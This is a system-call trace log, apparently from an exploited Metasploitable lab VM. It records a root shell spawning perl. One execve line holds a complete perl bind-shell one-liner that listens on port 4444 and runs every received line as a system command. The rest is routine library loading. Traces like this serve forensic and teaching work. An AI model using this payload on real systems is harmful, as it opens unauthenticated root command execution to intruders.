12376 07:42:09.206293 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

12376 07:42:09.206308 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

12376 07:42:09.206397 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

12376 07:42:09.206414 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d33000

12376 07:42:09.206431 mmap2(0xb7d3c000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d3c000

12376 07:42:09.206449 close(1)          = 0

12376 07:42:09.206469 munmap(0xb7eee000, 29913) = 0

12376 07:42:09.206485 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

12376 07:42:09.206500 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

12376 07:42:09.206512 _llseek(1, 0, [0], SEEK_CUR) = 0

12376 07:42:09.206523 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

12376 07:42:09.206540 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7ef5000

12376 07:42:09.206551 _llseek(1, 1624, [1624], SEEK_SET) = 0

12376 07:42:09.206566 munmap(0xb7ef5000, 1624) = 0

12376 07:42:09.206575 close(1)          = 0

12376 07:42:09.206604 getpgrp()         = 3831

12376 07:42:09.206614 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

12376 07:42:09.206629 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

12376 07:42:09.206646 brk(0x8101000)    = 0x8101000

12376 07:42:09.206677 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12376 07:42:09.206692 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12376 07:42:09.206706 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12376 07:42:09.206743 brk(0x8102000)    = 0x8102000

12376 07:42:09.206770 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12376 07:42:09.206789 stat64("/sbin/AB", 0xbfd01b58) = -1 ENOENT (No such file or directory)

12376 07:42:09.206801 stat64("/bin/AB", 0xbfd01b58) = -1 ENOENT (No such file or directory)

12376 07:42:09.206812 stat64("/usr/sbin/AB", 0xbfd01b58) = -1 ENOENT (No such file or directory)

12376 07:42:09.206824 stat64("/usr/bin/AB", 0xbfd01b58) = -1 ENOENT (No such file or directory)

12376 07:42:09.206842 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

12376 07:42:09.206857 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d696f8) = 12377

12377 07:42:09.206901 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12377 07:42:09.206917 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

12377 07:42:09.206939 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

12377 07:42:09.206978 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

12377 07:42:09.207010 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12377 07:42:09.207026 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

12377 07:42:09.207039 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

12377 07:42:09.207094 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

12377 07:42:09.207108 --- SIGPIPE (Broken pipe) @ 0 (0) ---

12377 07:42:09.207179 exit_group(127)   = ?

4519  07:42:09.220405 waitpid(12376,  <unfinished ...>

12376 07:42:09.220450 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12376 07:42:09.220465 --- SIGCHLD (Child exited) @ 0 (0) ---

12376 07:42:09.220480 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 12377

12376 07:42:09.220511 waitpid(-1, 0xbfd017d8, WNOHANG) = -1 ECHILD (No child processes)

12376 07:42:09.220522 sigreturn()       = ? (mask now [])

12376 07:42:09.220544 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

12376 07:42:09.220559 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12376 07:42:09.220569 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

12376 07:42:09.220581 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

12376 07:42:09.220600 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12376 07:42:09.220611 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

12376 07:42:09.220645 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12376 07:42:09.220665 stat64("/sbin/perl", 0xbfd01b88) = -1 ENOENT (No such file or directory)

12376 07:42:09.220677 stat64("/bin/perl", 0xbfd01b88) = -1 ENOENT (No such file or directory)

12376 07:42:09.220688 stat64("/usr/sbin/perl", 0xbfd01b88) = -1 ENOENT (No such file or directory)

12376 07:42:09.220700 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

12376 07:42:09.220717 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

12376 07:42:09.220742 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

12376 07:42:09.220756 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d696f8) = 12378

12378 07:42:09.220803 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12378 07:42:09.220819 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

12378 07:42:09.220831 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

12378 07:42:09.220948 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

12378 07:42:09.220965 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12378 07:42:09.220994 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

12378 07:42:09.221007 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

12378 07:42:09.221040 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

12378 07:42:09.221127 brk(0)            = 0x8153000

12378 07:42:09.221146 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12378 07:42:09.221161 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f66000

12378 07:42:09.221177 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

12378 07:42:09.221193 open("/etc/ld.so.cache", O_RDONLY) = 1

12378 07:42:09.221205 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12378 07:42:09.221221 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f5e000

12378 07:42:09.221231 close(1)          = 0

12378 07:42:09.221241 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12378 07:42:09.221262 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

12378 07:42:09.221276 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

12378 07:42:09.221365 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

12378 07:42:09.221382 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f5a000

12378 07:42:09.221394 mmap2(0xb7f5c000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f5c000

12378 07:42:09.221409 close(1)          = 0

12378 07:42:09.221427 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12378 07:42:09.221442 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

12378 07:42:09.221470 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

12378 07:42:09.221571 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

12378 07:42:09.221587 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f35000

12378 07:42:09.221598 mmap2(0xb7f58000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7f58000

12378 07:42:09.221613 close(1)          = 0

12378 07:42:09.221625 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12378 07:42:09.221638 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

12378 07:42:09.221652 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

12378 07:42:09.221739 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

12378 07:42:09.221755 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f34000

12378 07:42:09.221768 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f1c000

12378 07:42:09.221778 mmap2(0xb7f30000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7f30000

12378 07:42:09.221792 mmap2(0xb7f32000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f32000

12378 07:42:09.221805 close(1)          = 0

12378 07:42:09.221816 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12378 07:42:09.221829 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

12378 07:42:09.221843 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

12378 07:42:09.221889 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

12378 07:42:09.221889 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dcd000

12378 07:42:09.221889 mmap2(0xb7f16000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f16000

12378 07:42:09.221889 mmap2(0xb7f19000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f19000

12378 07:42:09.221890 close(1)          = 0

12378 07:42:09.221890 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12378 07:42:09.221890 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

12378 07:42:09.221890 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

12378 07:42:09.221890 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

12378 07:42:09.221891 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d9b000

12378 07:42:09.221891 mmap2(0xb7da4000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7da4000

12378 07:42:09.221891 mmap2(0xb7da6000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7da6000

12378 07:42:09.221898 close(1)          = 0

12378 07:42:09.221972 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d9a000

12378 07:42:09.222002 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d9a8c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

12378 07:42:09.222101 mprotect(0xb7f16000, 4096, PROT_READ) = 0

12378 07:42:09.222128 munmap(0xb7f5e000, 29913) = 0

12378 07:42:09.222141 set_tid_address(0xb7d9a908) = 12378

12378 07:42:09.222150 set_robust_list(0xb7d9a910, 0xc) = 0

12378 07:42:09.222159 futex(0xbfa20ec0, 0x81 /* FUTEX_??? */, 1) = 0

12378 07:42:09.222172 rt_sigaction(SIGRTMIN, {0xb7f202c0, [], SA_SIGINFO}, NULL, 8) = 0

12378 07:42:09.222185 rt_sigaction(SIGRT_1, {0xb7f20340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

12378 07:42:09.222197 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

12378 07:42:09.222210 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

12378 07:42:09.222231 uname({sys="Linux", node="metasploitable", ...}) = 0

12378 07:42:09.222276 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

12378 07:42:09.222321 brk(0)            = 0x8153000

12378 07:42:09.222330 brk(0x8174000)    = 0x8174000

12378 07:42:09.222371 getuid32()        = 0

12378 07:42:09.222387 geteuid32()       = 0

12378 07:42:09.222398 getgid32()        = 0

12378 07:42:09.222406 getegid32()       = 0

12378 07:42:09.222443 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d79000

12378 07:42:09.222468 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

12378 07:42:09.222484 read(1, "\0\304\261d", 4) = 4

12378 07:42:09.222498 close(1)          = 0

12378 07:42:09.222515 time(NULL)        = 1495626129

12378 07:42:09.222555 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbfa20b90) = -1 ENOENT (No such file or directory)

12378 07:42:09.222572 stat64("/usr/local/lib/site_perl/5.8.8", 0xbfa20b90) = -1 ENOENT (No such file or directory)

12378 07:42:09.222585 stat64("/usr/local/lib/site_perl/i486-linux-gnu-thread-multi", 0xbfa20b90) = -1 ENOENT (No such file or directory)

12378 07:42:09.222600 stat64("/usr/local/lib/perl/5.8.7", 0xbfa20cd0) = -1 ENOENT (No such file or directory)

12378 07:42:09.222612 stat64("/usr/local/share/perl/5.8.7", 0xbfa20cd0) = -1 ENOENT (No such file or directory)

12378 07:42:09.222624 stat64("/usr/local/lib/perl/5.8.6", 0xbfa20cd0) = -1 ENOENT (No such file or directory)

12378 07:42:09.222636 stat64("/usr/local/share/perl/5.8.6", 0xbfa20cd0) = -1 ENOENT (No such file or directory)

12378 07:42:09.222647 stat64("/usr/local/lib/perl/5.8.4", 0xbfa20cd0) = -1 ENOENT (No such file or directory)

12378 07:42:09.222659 stat64("/usr/local/share/perl/5.8.4", 0xbfa20cd0) = -1 ENOENT (No such file or directory)

12378 07:42:09.222670 stat64("/usr/local/lib/perl/5.8.3", 0xbfa20cd0) = -1 ENOENT (No such file or directory)

12378 07:42:09.222681 stat64("/usr/local/share/perl/5.8.3", 0xbfa20cd0) = -1 ENOENT (No such file or directory)

12378 07:42:09.222693 stat64("/usr/local/lib/perl/5.8.2", 0xbfa20cd0) = -1 ENOENT (No such file or directory)

12378 07:42:09.222704 stat64("/usr/local/share/perl/5.8.2", 0xbfa20cd0) = -1 ENOENT (No such file or directory)

12378 07:42:09.222715 stat64("/usr/local/lib/perl/5.8.1", 0xbfa20cd0) = -1 ENOENT (No such file or directory)

12378 07:42:09.222727 stat64("/usr/local/share/perl/5.8.1", 0xbfa20cd0) = -1 ENOENT (No such file or directory)

12378 07:42:09.222742 stat64("/usr/local/lib/perl/5.8.0", 0xbfa20cd0) = -1 ENOENT (No such file or directory)

12378 07:42:09.222754 stat64("/usr/local/share/perl/5.8.0", 0xbfa20cd0) = -1 ENOENT (No such file or directory)

12378 07:42:09.222775 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfa209c8) = -1 ENOTTY (Inappropriate ioctl for device)

12378 07:42:09.222789 _llseek(0, 0, [0], SEEK_CUR) = 0

12378 07:42:09.222800 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfa209c8) = -1 EBADF (Bad file descriptor)

12378 07:42:09.222811 _llseek(1, 0, 0xbfa20a10, SEEK_CUR) = -1 EBADF (Bad file descriptor)

12378 07:42:09.222821 ioctl(2, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfa209c8) = -1 EINVAL (Invalid argument)

12378 07:42:09.222832 _llseek(2, 0, 0xbfa20a10, SEEK_CUR) = -1 ESPIPE (Illegal seek)

